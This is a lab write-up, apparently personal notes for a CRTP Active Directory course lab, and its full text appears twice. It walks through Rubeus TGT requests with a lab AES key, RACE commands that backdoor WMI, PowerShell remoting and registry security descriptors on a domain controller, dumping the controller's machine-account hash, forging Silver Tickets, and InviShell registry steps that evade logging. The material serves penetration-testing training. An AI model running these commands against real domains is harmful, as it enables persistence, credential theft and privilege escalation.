CRTP Lab 13

Task 1

Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.

Open elevated DA cmd:

#ArgSplit asktgt

#Open DA cmd:
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

After we get the shell as DA, run InviShell and import RACE

#InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

#InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Import RACE
. C:\AD\Tools\RACE.ps1

Next, we try to provide student the same permissions as Builtin Administrator (BA) on root\cimv2 WMI namespace)

Set-RemoteWMI -SamAccountName student372 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

We have modified Security Descriptors and hence we can execute WMI queries as student without Administrative cmd.

gwmi -class win32_operatingsystem -ComputerName dcorp-dc

SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

Task 2

Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.

Before we retrieve machine account hash, we need to modify permissions on DC.

# Spawn a new Powershell.

powershell

. C:\AD\Tools\RACE.ps1

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student372 -Verbose

ComputerName                        BackdoorTrustee
------------                        ---------------
dcorp-dc.dollarcorp.moneycorp.local student372

Since student is added as backdoor, we can retrieve hash as student372.

# Spawn new powershell
. C:\AD\Tools\RACE.ps1

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose


ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     0a05dd30b8f44589c534dcd951c765b6

Using the machine hash, we can use Silver Ticket attack on Host and RPCSS services.

# Host
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# RPCSS
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

PS Remoting:

PSRemoting:
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\AD\Tools> . C:\AD\Tools\RACE.ps1
PS C:\AD\Tools> Set-RemotePSRemoting -SamAccountName student372 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\AD\Tools>

PreviousSecurity Descriptors NextTools

Last updated 9 months ago

CRTP Lab 13

Task 1

Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.

Open elevated DA cmd:

#ArgSplit asktgt

#Open DA cmd:
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

After we get the shell as DA, run InviShell and import RACE

#InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

#InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Import RACE
. C:\AD\Tools\RACE.ps1

Next, we try to provide student the same permissions as Builtin Administrator (BA) on root\cimv2 WMI namespace)

Set-RemoteWMI -SamAccountName student372 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

We have modified Security Descriptors and hence we can execute WMI queries as student without Administrative cmd.

gwmi -class win32_operatingsystem -ComputerName dcorp-dc

SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

Task 2

Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.

Before we retrieve machine account hash, we need to modify permissions on DC.

# Spawn a new Powershell.

powershell

. C:\AD\Tools\RACE.ps1

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student372 -Verbose

ComputerName                        BackdoorTrustee
------------                        ---------------
dcorp-dc.dollarcorp.moneycorp.local student372

Since student is added as backdoor, we can retrieve hash as student372.

# Spawn new powershell
. C:\AD\Tools\RACE.ps1

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose


ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     0a05dd30b8f44589c534dcd951c765b6

Using the machine hash, we can use Silver Ticket attack on Host and RPCSS services.

# Host
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# RPCSS
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

PS Remoting:

PSRemoting:
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\AD\Tools> . C:\AD\Tools\RACE.ps1
PS C:\AD\Tools> Set-RemotePSRemoting -SamAccountName student372 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\AD\Tools>

PreviousSecurity Descriptors NextTools

Last updated 9 months ago